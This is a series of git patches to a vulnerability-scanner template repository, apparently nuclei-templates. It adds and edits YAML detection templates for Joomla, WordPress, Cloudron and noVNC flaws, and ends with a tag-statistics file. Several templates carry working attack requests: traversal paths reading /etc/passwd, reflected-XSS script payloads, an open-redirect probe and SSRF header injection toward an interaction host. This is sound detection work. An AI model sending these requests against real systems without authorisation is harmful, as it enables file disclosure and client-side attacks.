https://www.cvedetails.com/cve/CVE-2010-1715 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-1873.yml b/cves/2010/CVE-2010-1873.yaml similarity index 83% rename from cves/2010/CVE-2010-1873.yml rename to cves/2010/CVE-2010-1873.yaml index 8be5d8b989..4331b8702c 100644 --- a/cves/2010/CVE-2010-1873.yml +++ b/cves/2010/CVE-2010-1873.yaml @@ -4,8 +4,8 @@ info: name: Joomla! Component Jvehicles - Local File Inclusion author: daffainfo severity: high - description: SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php. NOTE: some of these details are obtained from third party information. - reference: | + description: SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php. + reference: - https://www.exploit-db.com/exploits/11997 - https://www.cvedetails.com/cve/CVE-2010-1873 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-1878.yml b/cves/2010/CVE-2010-1878.yaml similarity index 96% rename from cves/2010/CVE-2010-1878.yml rename to cves/2010/CVE-2010-1878.yaml index 12459b34f7..551f28d4a6 100644 --- a/cves/2010/CVE-2010-1878.yml +++ b/cves/2010/CVE-2010-1878.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/12317 - https://www.cvedetails.com/cve/CVE-2010-1878 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-1957.yml b/cves/2010/CVE-2010-1957.yml deleted file mode 100644 index 63a50e8224..0000000000 --- a/cves/2010/CVE-2010-1957.yml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1957 - -info: - name: Joomla! Component Love Factory 1.3.4 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12235 - - https://www.cvedetails.com/cve/CVE-2010-1957 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1977.yml b/cves/2010/CVE-2010-1977.yaml similarity index 100% rename from cves/2010/CVE-2010-1977.yml rename to cves/2010/CVE-2010-1977.yaml diff --git a/cves/2010/CVE-2010-1982.yml b/cves/2010/CVE-2010-1982.yaml similarity index 96% rename from cves/2010/CVE-2010-1982.yml rename to cves/2010/CVE-2010-1982.yaml index 1ef0e13f14..f58840909d 100644 --- a/cves/2010/CVE-2010-1982.yml +++ b/cves/2010/CVE-2010-1982.yaml @@ -1,11 +1,10 @@ id: CVE-2010-1982 - info: name: Joomla! Component JA Voice 2.0 - Local File Inclusion author: daffainfo severity: high description: Directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/12121 - https://www.cvedetails.com/cve/CVE-2010-1982 tags: cve,cve2010,joomla,lfi From cea8db929e6c2099910491ad2a503e936331b002 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 Sep 2021 13:08:18 +0000 Subject: [PATCH 2540/4083] Auto Generated CVE annotations [Mon Sep 27 13:08:18 UTC 2021] :robot: --- cves/2010/CVE-2010-0467.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2010/CVE-2010-0467.yaml b/cves/2010/CVE-2010-0467.yaml index 563c3c96c0..6bb7060bae 100644 --- a/cves/2010/CVE-2010-0467.yaml +++ b/cves/2010/CVE-2010-0467.yaml @@ -3,12 +3,17 @@ id: CVE-2010-0467 info: name: Joomla! Component CCNewsLetter - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php. reference: | - https://www.exploit-db.com/exploits/11282 - https://www.cvedetails.com/cve/CVE-2010-0467 tags: cve,cve2010,joomla,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.80 + cve-id: CVE-2010-0467 + cwe-id: CWE-22 requests: - method: GET From f0dda40b1b6bdbe65504e11e843061a64b0e28b2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 27 Sep 2021 22:45:53 +0530 Subject: [PATCH 2541/4083] Create CVE-2021-39320.yaml --- cves/2021/CVE-2021-39320.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2021/CVE-2021-39320.yaml diff --git a/cves/2021/CVE-2021-39320.yaml b/cves/2021/CVE-2021-39320.yaml new file mode 100644 index 0000000000..5719b82f47 --- /dev/null +++ b/cves/2021/CVE-2021-39320.yaml @@ -0,0 +1,27 @@ +id: CVE-2021-39320 + +info: + name: underConstruction < 1.19 - Reflected Cross-Site Scripting + author: dhiyaneshDK + severity: medium + reference: + - https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875 + tags: wordpress,xss,cves,cve2021 +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin.php/">/?page=under-construction' + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 6f3678a7e8201dadd177768db7719931f8321306 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 Sep 2021 17:17:13 +0000 Subject: [PATCH 2542/4083] Auto Generated CVE annotations [Mon Sep 27 17:17:13 UTC 2021] :robot: --- cves/2021/CVE-2021-39320.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/cves/2021/CVE-2021-39320.yaml b/cves/2021/CVE-2021-39320.yaml index 5719b82f47..3e5a9c2cc1 100644 --- a/cves/2021/CVE-2021-39320.yaml +++ b/cves/2021/CVE-2021-39320.yaml @@ -7,6 +7,12 @@ info: reference: - https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875 tags: wordpress,xss,cves,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-39320 + cwe-id: CWE-79 + description: "The underConstruction plugin <= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible to use it to perform a reflected Cross-Site Scripting attack by injecting malicious code in the request path." requests: - method: GET path: From b0ce4b83cf4412eace746d5f214412a395988c5e Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 28 Sep 2021 09:31:37 +0900 Subject: [PATCH 2543/4083] Create wp-church-admin-lfi.yaml --- wp-church-admin-lfi.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 wp-church-admin-lfi.yaml diff --git a/wp-church-admin-lfi.yaml b/wp-church-admin-lfi.yaml new file mode 100644 index 0000000000..b97b529ca9 --- /dev/null +++ b/wp-church-admin-lfi.yaml @@ -0,0 +1,24 @@ +id: wp-plugin-church-admin-lfi + +info: + name: Church Admin 0.33.2.1 - Unauthenticated Directory Traversal + author: 0x_Akoko + severity: high + tags: wordpress,wp-plugin,lfi + reference: https://wpscan.com/vulnerability/8997 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 3fd4dfacde29fa207d0956a02bd62f545e155d6d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 28 Sep 2021 07:42:28 +0700 Subject: [PATCH 2544/4083] Create CVE-2021-40868.yaml --- cves/2021/CVE-2021-40868.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2021/CVE-2021-40868.yaml diff --git a/cves/2021/CVE-2021-40868.yaml b/cves/2021/CVE-2021-40868.yaml new file mode 100644 index 0000000000..efec85092f --- /dev/null +++ b/cves/2021/CVE-2021-40868.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-40868 + +info: + name: Cloudron 6.2 Cross Site Scripting + author: daffainfo + description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to Reflected XSS. + severity: medium + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-40868 + - https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html + tags: cve,cve2021,xss,cloudron + +requests: + - method: GET + path: + - '{{BaseURL}}/login.html?returnTo=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + words: + - '">' + part: body From 2b635a352e5d93d3c3c6a9bbfef99b80f035e6b6 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 27 Sep 2021 20:53:50 -0500 Subject: [PATCH 2545/4083] Create CVE-2021-3654.yaml --- cves/2021/CVE-2021-3654.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2021/CVE-2021-3654.yaml diff --git a/cves/2021/CVE-2021-3654.yaml b/cves/2021/CVE-2021-3654.yaml new file mode 100644 index 0000000000..a39cee30f4 --- /dev/null +++ b/cves/2021/CVE-2021-3654.yaml @@ -0,0 +1,26 @@ +id: CVE-2021-3654 + +info: + name: noVNC Open Redirect + author: geeknik + severity: low + description: A user-controlled input redirects noVNC users to an external website. + tags: redirect,novnc,cve,cve2021 + +requests: + - method: GET + + path: + - '{{BaseURL}}//example.com/%2f..' + + matchers-condition: and + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header + + - type: status + status: + - 302 + - 301 From ca7a035303e98f49e3b641d6b15408f992baed16 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 27 Sep 2021 20:58:51 -0500 Subject: [PATCH 2546/4083] Update CVE-2021-3654.yaml add reference --- cves/2021/CVE-2021-3654.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/cves/2021/CVE-2021-3654.yaml b/cves/2021/CVE-2021-3654.yaml index a39cee30f4..3fd9a96620 100644 --- a/cves/2021/CVE-2021-3654.yaml +++ b/cves/2021/CVE-2021-3654.yaml @@ -5,6 +5,9 @@ info: author: geeknik severity: low description: A user-controlled input redirects noVNC users to an external website. + reference: + - https://seclists.org/oss-sec/2021/q3/188 + - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3654 tags: redirect,novnc,cve,cve2021 requests: From 1a4f6754b44948ec9f10e76806d6849410c48580 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 28 Sep 2021 15:15:57 +0530 Subject: [PATCH 2547/4083] Create generic-oob-header-based-interaction.yaml --- .../generic-oob-header-based-interaction.yaml | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 vulnerabilities/generic/generic-oob-header-based-interaction.yaml diff --git a/vulnerabilities/generic/generic-oob-header-based-interaction.yaml b/vulnerabilities/generic/generic-oob-header-based-interaction.yaml new file mode 100644 index 0000000000..5a6ad517a0 --- /dev/null +++ b/vulnerabilities/generic/generic-oob-header-based-interaction.yaml @@ -0,0 +1,40 @@ +id: generic-oob-header-based-interaction + +info: + name: Header Based Generic OOB Interaction + author: pdteam + severity: info + description: The remote server fetched a spoofed URL from the request headers. + reference: https://github.com/PortSwigger/collaborator-everywhere + tags: oob,ssrf,generic + +requests: + - method: GET + path: + - "{{BaseURL}}" + headers: + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@{{interactsh-url}} + Referer: http://{{interactsh-url}}/ref + Cf-Connecting_ip: spoofed.{{interactsh-url}} + X-Real-Ip: spoofed.{{interactsh-url}} + From: root@{{interactsh-url}} + True-Client-Ip: spoofed.{{interactsh-url}} + Client-Ip: spoofed.{{interactsh-url}} + Forwarded: for=spoofed.{{interactsh-url}};by=spoofed.{{interactsh-url}};host=spoofed.{{interactsh-url}} + X-Client-Ip: spoofed.{{interactsh-url}} + X-Originating-Ip: spoofed.{{interactsh-url}} + X-Wap-Profile: http://{{interactsh-url}}/wap.xml + X-Forwarded-For: spoofed.{{interactsh-url}} + Contact: root@{{interactsh-url}} + X-Forwarded-Host: 'spoofed.{{interactsh-url}}' + X-Host: 'spoofed.{{interactsh-url}}' + X-Forwarded-Server: 'spoofed.{{interactsh-url}}' + X-HTTP-Host-Override: 'spoofed.{{interactsh-url}}' + Cache-Control: no-transform + + matchers: + - type: word + part: interactsh_protocol + name: http + words: + - "http" From c72e1be129baf4e156f0955a0212fbe736e2b1dd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 Sep 2021 09:46:34 +0000 Subject: [PATCH 2548/4083] Auto Generated Templates Stats [Tue Sep 28 09:46:34 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1579 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 803 insertions(+), 798 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 991eabbc05..c0663f1861 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":725},{"name":"lfi","count":260},{"name":"panel","count":248},{"name":"xss","count":244},{"name":"exposure","count":231},{"name":"wordpress","count":223},{"name":"rce","count":198},{"name":"tech","count":181},{"name":"cve2020","count":164},{"name":"wp-plugin","count":149},{"name":"cve2021","count":127},{"name":"cve2019","count":96},{"name":"config","count":94},{"name":"cve2018","count":85},{"name":"joomla","count":79},{"name":"apache","count":70},{"name":"cve2010","count":69},{"name":"takeover","count":68},{"name":"token","count":65},{"name":"default-login","count":63},{"name":"iot","count":62},{"name":"oob","count":53},{"name":"cve2017","count":50},{"name":"unauth","count":47},{"name":"file","count":46},{"name":"network","count":41},{"name":"sqli","count":38},{"name":"ssrf","count":37},{"name":"cve2016","count":36},{"name":"","count":36},{"name":"oracle","count":36},{"name":"redirect","count":33},{"name":"logs","count":30},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"misc","count":23},{"name":"cve2015","count":23},{"name":"disclosure","count":21},{"name":"generic","count":20},{"name":"auth-bypass","count":20},{"name":"cisco","count":19},{"name":"aem","count":19},{"name":"router","count":19},{"name":"debug","count":18},{"name":"cve2014","count":18},{"name":"sap","count":18},{"name":"springboot","count":18},{"name":"misconfig","count":18},{"name":"php","count":16},{"name":"fuzz","count":14},{"name":"weblogic","count":14},{"name":"login","count":14},{"name":"cve2011","count":14},{"name":"struts","count":14},{"name":"cve2012","count":14},{"name":"dns","count":13},{"name":"zoho","count":13},{"name":"android","count":13},{"name":"adobe","count":13},{"name":"devops","count":13},{"name":"dlink","count":12},{"name":"aws","count":12},{"name":"manageengine","count":12},{"name":"jenkins","count":12},{"name":"cve2013","count":11},{"name":"wp-theme","count":11},{"name":"xxe","count":10},{"name":"dell","count":10},{"name":"intrusive","count":9},{"name":"ftp","count":9},{"name":"magento","count":9},{"name":"gitlab","count":8},{"name":"nginx","count":8},{"name":"airflow","count":8},{"name":"ruijie","count":8},{"name":"rails","count":8},{"name":"vmware","count":8},{"name":"scada","count":8},{"name":"cnvd","count":8},{"name":"files","count":7},{"name":"ibm","count":7},{"name":"coldfusion","count":7},{"name":"netgear","count":7},{"name":"backup","count":7},{"name":"cve2009","count":7},{"name":"cms","count":7},{"name":"microsoft","count":7},{"name":"kubernetes","count":7},{"name":"confluence","count":7},{"name":"google","count":7},{"name":"django","count":6},{"name":"cve2008","count":6},{"name":"solr","count":6},{"name":"api","count":6},{"name":"jetty","count":6},{"name":"laravel","count":6},{"name":"rconfig","count":6},{"name":"docker","count":6},{"name":"citrix","count":6},{"name":"dedecms","count":5},{"name":"iis","count":5},{"name":"java","count":5},{"name":"deserialization","count":5},{"name":"circarlife","count":5},{"name":"headless","count":5},{"name":"drupal","count":5},{"name":"windows","count":5},{"name":"phpmyadmin","count":5},{"name":"lucee","count":5},{"name":"ssti","count":5},{"name":"printer","count":5},{"name":"jolokia","count":5},{"name":"hp","count":5},{"name":"tomcat","count":5},{"name":"nodejs","count":5},{"name":"fileupload","count":5},{"name":"elastic","count":4},{"name":"thinkcmf","count":4},{"name":"symfony","count":4},{"name":"glpi","count":4},{"name":"thinkphp","count":4},{"name":"artifactory","count":4},{"name":"webserver","count":4},{"name":"strapi","count":4},{"name":"proxy","count":4},{"name":"samsung","count":4},{"name":"exchange","count":4},{"name":"symantec","count":4},{"name":"grafana","count":4},{"name":"camera","count":4},{"name":"magmi","count":4},{"name":"resin","count":4},{"name":"zimbra","count":4},{"name":"firmware","count":4},{"name":"moodle","count":4},{"name":"solarwinds","count":4},{"name":"buffalo","count":4},{"name":"zabbix","count":4},{"name":"wso2","count":4},{"name":"crlf","count":4},{"name":"hongdian","count":4},{"name":"git","count":4},{"name":"traversal","count":4},{"name":"vpn","count":4},{"name":"asp","count":4},{"name":"log","count":3},{"name":"fpd","count":3},{"name":"kevinlab","count":3},{"name":"nacos","count":3},{"name":"amazon","count":3},{"name":"ebs","count":3},{"name":"mongodb","count":3},{"name":"tikiwiki","count":3},{"name":"openssh","count":3},{"name":"opensis","count":3},{"name":"npm","count":3},{"name":"slack","count":3},{"name":"terramaster","count":3},{"name":"itop","count":3},{"name":"ofbiz","count":3},{"name":"springcloud","count":3},{"name":"r-seenet","count":3},{"name":"fanruan","count":3},{"name":"bitrix","count":3},{"name":"vbulletin","count":3},{"name":"targa","count":3},{"name":"backups","count":3},{"name":"prometheus","count":3},{"name":"bigip","count":3},{"name":"microstrategy","count":3},{"name":"oa","count":3},{"name":"smtp","count":3},{"name":"nosqli","count":3},{"name":"lfr","count":3},{"name":"firebase","count":3},{"name":"injection","count":3},{"name":"druid","count":3},{"name":"ssh","count":3},{"name":"telerik","count":3},{"name":"kibana","count":3},{"name":"mail","count":3},{"name":"kafka","count":3},{"name":"hoteldruid","count":3},{"name":"jellyfin","count":3},{"name":"linkerd","count":3},{"name":"nexus","count":3},{"name":"openam","count":3},{"name":"httpd","count":3},{"name":"caucho","count":3},{"name":"cacti","count":3},{"name":"zhiyuan","count":3},{"name":"jeesns","count":3},{"name":"waf","count":2},{"name":"minio","count":2},{"name":"db","count":2},{"name":"plesk","count":2},{"name":"netsweeper","count":2},{"name":"trixbox","count":2},{"name":"yapi","count":2},{"name":"rstudio","count":2},{"name":"hasura","count":2},{"name":"enumeration","count":2},{"name":"ilo","count":2},{"name":"natshell","count":2},{"name":"storage","count":2},{"name":"middleware","count":2},{"name":"akamai","count":2},{"name":"ecology","count":2},{"name":"sonarqube","count":2},{"name":"bypass","count":2},{"name":"geowebserver","count":2},{"name":"hpe","count":2},{"name":"getsimple","count":2},{"name":"ucmdb","count":2},{"name":"grav","count":2},{"name":"webcam","count":2},{"name":"couchdb","count":2},{"name":"smb","count":2},{"name":"activemq","count":2},{"name":"fortios","count":2},{"name":"splunk","count":2},{"name":"avantfax","count":2},{"name":"dos","count":2},{"name":"icewarp","count":2},{"name":"glassfish","count":2},{"name":"bucket","count":2},{"name":"rockmongo","count":2},{"name":"node","count":2},{"name":"huawei","count":2},{"name":"akkadian","count":2},{"name":"qcubed","count":2},{"name":"emerge","count":2},{"name":"maian","count":2},{"name":"nextjs","count":2},{"name":"harbor","count":2},{"name":"adminer","count":2},{"name":"odoo","count":2},{"name":"phpcollab","count":2},{"name":"kong","count":2},{"name":"chiyu","count":2},{"name":"service","count":2},{"name":"vrealize","count":2},{"name":"hashicorp","count":2},{"name":"frp","count":2},{"name":"status","count":2},{"name":"ec2","count":2},{"name":"seeyon","count":2},{"name":"flir","count":2},{"name":"wordfence","count":2},{"name":"idrac","count":2},{"name":"voipmonitor","count":2},{"name":"sonicwall","count":2},{"name":"hostheader-injection","count":2},{"name":"cve2005","count":2},{"name":"favicon","count":2},{"name":"igs","count":2},{"name":"nextcloud","count":2},{"name":"wuzhicms","count":2},{"name":"shellshock","count":2},{"name":"backdoor","count":2},{"name":"github","count":2},{"name":"sharepoint","count":2},{"name":"linux","count":2},{"name":"chamilo","count":2},{"name":"pega","count":2},{"name":"horde","count":2},{"name":"paloalto","count":2},{"name":"jsf","count":2},{"name":"mida","count":2},{"name":"showdoc","count":2},{"name":"dolibarr","count":2},{"name":"cve2007","count":2},{"name":"axis","count":2},{"name":"leak","count":2},{"name":"spark","count":2},{"name":"yii","count":2},{"name":"jeedom","count":2},{"name":"mcafee","count":2},{"name":"aruba","count":2},{"name":"nagios","count":2},{"name":"bruteforce","count":2},{"name":"axis2","count":2},{"name":"netis","count":2},{"name":"hjtcloud","count":2},{"name":"liferay","count":2},{"name":"jboss","count":2},{"name":"globalprotect","count":2},{"name":"cache","count":2},{"name":"saltstack","count":2},{"name":"prestashop","count":2},{"name":"sitecore","count":2},{"name":"openfire","count":2},{"name":"xxljob","count":2},{"name":"azure","count":2},{"name":"totemomail","count":2},{"name":"guacamole","count":2},{"name":"oauth","count":2},{"name":"keycloak","count":2},{"name":"prtg","count":2},{"name":"kentico","count":2},{"name":"netgenie","count":1},{"name":"timeclock","count":1},{"name":"graphql","count":1},{"name":"mediumish","count":1},{"name":"basic-auth","count":1},{"name":"meraki","count":1},{"name":"jmx","count":1},{"name":"phpfusion","count":1},{"name":"ecom","count":1},{"name":"pulsesecure","count":1},{"name":"spectracom","count":1},{"name":"hadoop","count":1},{"name":"pihole","count":1},{"name":"tjws","count":1},{"name":"dvwa","count":1},{"name":"mongo","count":1},{"name":"zarafa","count":1},{"name":"exposures","count":1},{"name":"heroku","count":1},{"name":"gespage","count":1},{"name":"webui","count":1},{"name":"st","count":1},{"name":"monitorr","count":1},{"name":"minimouse","count":1},{"name":"extractor","count":1},{"name":"zyxel","count":1},{"name":"plastic","count":1},{"name":"ns","count":1},{"name":"luftguitar","count":1},{"name":"tenda","count":1},{"name":"lanproxy","count":1},{"name":"dompdf","count":1},{"name":"cofax","count":1},{"name":"owa","count":1},{"name":"exacqvision","count":1},{"name":"tensorboard","count":1},{"name":"fortigate","count":1},{"name":"pyramid","count":1},{"name":"cerebro","count":1},{"name":"lighttpd","count":1},{"name":"mobileiron","count":1},{"name":"gitlist","count":1},{"name":"tongda","count":1},{"name":"jquery","count":1},{"name":"gstorage","count":1},{"name":"diris","count":1},{"name":"shoretel","count":1},{"name":"graphite","count":1},{"name":"aspnuke","count":1},{"name":"wamp","count":1},{"name":"email","count":1},{"name":"shopizer","count":1},{"name":"tcexam","count":1},{"name":"zms","count":1},{"name":"rabbitmq","count":1},{"name":"apos","count":1},{"name":"swagger","count":1},{"name":"postmessage","count":1},{"name":"h3c-imc","count":1},{"name":"gunicorn","count":1},{"name":"tamronos","count":1},{"name":"rubedo","count":1},{"name":"triconsole","count":1},{"name":"qsan","count":1},{"name":"mysql","count":1},{"name":"oneblog","count":1},{"name":"avtech","count":1},{"name":"smartblog","count":1},{"name":"sangfor","count":1},{"name":"parentlink","count":1},{"name":"influxdb","count":1},{"name":"argussurveillance","count":1},{"name":"fortiweb","count":1},{"name":"chyrp","count":1},{"name":"wmt","count":1},{"name":"pcoip","count":1},{"name":"auth","count":1},{"name":"node-red-dashboard","count":1},{"name":"etouch","count":1},{"name":"dom","count":1},{"name":"elasticsearch","count":1},{"name":"tika","count":1},{"name":"xampp","count":1},{"name":"actuator","count":1},{"name":"solman","count":1},{"name":"traefik","count":1},{"name":"sqlite","count":1},{"name":"wiki","count":1},{"name":"asus","count":1},{"name":"tectuus","count":1},{"name":"springframework","count":1},{"name":"panabit","count":1},{"name":"javascript","count":1},{"name":"eg","count":1},{"name":"csod","count":1},{"name":"ntopng","count":1},{"name":"websphere","count":1},{"name":"simplecrm","count":1},{"name":"shoppable","count":1},{"name":"zend","count":1},{"name":"upnp","count":1},{"name":"memcached","count":1},{"name":"camunda","count":1},{"name":"tapestry","count":1},{"name":"mantis","count":1},{"name":"achecker","count":1},{"name":"sprintful","count":1},{"name":"tor","count":1},{"name":"wildfly","count":1},{"name":"cse","count":1},{"name":"ruckus","count":1},{"name":"ognl","count":1},{"name":"haproxy","count":1},{"name":"majordomo2","count":1},{"name":"dnssec","count":1},{"name":"spring","count":1},{"name":"addpac","count":1},{"name":"geutebruck","count":1},{"name":"landray","count":1},{"name":"interlib","count":1},{"name":"ecoa","count":1},{"name":"turbocrm","count":1},{"name":"jeewms","count":1},{"name":"eyelock","count":1},{"name":"rfi","count":1},{"name":"nimble","count":1},{"name":"bash","count":1},{"name":"xiuno","count":1},{"name":"vnc","count":1},{"name":"pippoint","count":1},{"name":"pmb","count":1},{"name":"ganglia","count":1},{"name":"fastcgi","count":1},{"name":"zenario","count":1},{"name":"omi","count":1},{"name":"sentry","count":1},{"name":"yachtcontrol","count":1},{"name":"woocomernce","count":1},{"name":"mpsec","count":1},{"name":"hiawatha","count":1},{"name":"phpinfo","count":1},{"name":"oscommerce","count":1},{"name":"biometrics","count":1},{"name":"qvisdvr","count":1},{"name":"mautic","count":1},{"name":"kerbynet","count":1},{"name":"bolt","count":1},{"name":"ruby","count":1},{"name":"spf","count":1},{"name":"labtech","count":1},{"name":"dotclear","count":1},{"name":"sarg","count":1},{"name":"discord","count":1},{"name":"clickhouse","count":1},{"name":"upload","count":1},{"name":"sceditor","count":1},{"name":"lotuscms","count":1},{"name":"thinkadmin","count":1},{"name":"tileserver","count":1},{"name":"klog","count":1},{"name":"mrtg","count":1},{"name":"cscart","count":1},{"name":"zeroshell","count":1},{"name":"csrf","count":1},{"name":"octobercms","count":1},{"name":"shopware","count":1},{"name":"cockpit","count":1},{"name":"ssltls","count":1},{"name":"stem","count":1},{"name":"netrc","count":1},{"name":"cherokee","count":1},{"name":"esmtp","count":1},{"name":"wooyun","count":1},{"name":"panos","count":1},{"name":"wifisky","count":1},{"name":"myvuehelp","count":1},{"name":"pacsone","count":1},{"name":"phpunit","count":1},{"name":"ricoh","count":1},{"name":"iceflow","count":1},{"name":"k8s","count":1},{"name":"commscope","count":1},{"name":"nweb2fax","count":1},{"name":"centos","count":1},{"name":"fastapi","count":1},{"name":"shiro","count":1},{"name":"opensns","count":1},{"name":"metinfo","count":1},{"name":"seacms","count":1},{"name":"elfinder","count":1},{"name":"resourcespace","count":1},{"name":"monitorix","count":1},{"name":"plone","count":1},{"name":"scs","count":1},{"name":"postgres","count":1},{"name":"opentsdb","count":1},{"name":"xml","count":1},{"name":"timesheet","count":1},{"name":"domxss","count":1},{"name":"floc","count":1},{"name":"linkedin","count":1},{"name":"javafaces","count":1},{"name":"emc","count":1},{"name":"glances","count":1},{"name":"miscrsoft","count":1},{"name":"artica","count":1},{"name":"dotnetnuke","count":1},{"name":"nomad","count":1},{"name":"rmc","count":1},{"name":"fiori","count":1},{"name":"jitsi","count":1},{"name":"totaljs","count":1},{"name":"mongoshake","count":1},{"name":"gitea","count":1},{"name":"saltapi","count":1},{"name":"wing-ftp","count":1},{"name":"redhat","count":1},{"name":"setup","count":1},{"name":"sco","count":1},{"name":"servicedesk","count":1},{"name":"glowroot","count":1},{"name":"expn","count":1},{"name":"visualtools","count":1},{"name":"jenzabar","count":1},{"name":"checkpoint","count":1},{"name":"fuelcms","count":1},{"name":"sidekiq","count":1},{"name":"wavemaker","count":1},{"name":"gridx","count":1},{"name":"pgadmin","count":1},{"name":"emby","count":1},{"name":"adb","count":1},{"name":"fortigates","count":1},{"name":"solarlog","count":1},{"name":"empirecms","count":1},{"name":"listserv","count":1},{"name":"zmanda","count":1},{"name":"iptime","count":1},{"name":"gogs","count":1},{"name":"zzzcms","count":1},{"name":"pagespeed","count":1},{"name":"kindeditor","count":1},{"name":"ilo4","count":1},{"name":"mirai","count":1},{"name":"kubeflow","count":1},{"name":"nuxeo","count":1},{"name":"clockwork","count":1},{"name":"grails","count":1},{"name":"crm","count":1},{"name":"octoprint","count":1},{"name":"clockwatch","count":1},{"name":"blind","count":1},{"name":"sureline","count":1},{"name":"opensmtpd","count":1},{"name":"discourse","count":1},{"name":"api-manager","count":1},{"name":"processmaker","count":1},{"name":"mdb","count":1},{"name":"svnserve","count":1},{"name":"spidercontrol","count":1},{"name":"panasonic","count":1},{"name":"krweb","count":1},{"name":"optiLink","count":1},{"name":"74cms","count":1},{"name":"fortinet","count":1},{"name":"oidc","count":1},{"name":"whm","count":1},{"name":"lancom","count":1},{"name":"jsp","count":1},{"name":"k8","count":1},{"name":"database","count":1},{"name":"concrete","count":1},{"name":"ems","count":1},{"name":"spip","count":1},{"name":"sophos","count":1},{"name":"accela","count":1},{"name":"realteo","count":1},{"name":"elascticsearch","count":1},{"name":"azkaban","count":1},{"name":"robomongo","count":1},{"name":"selea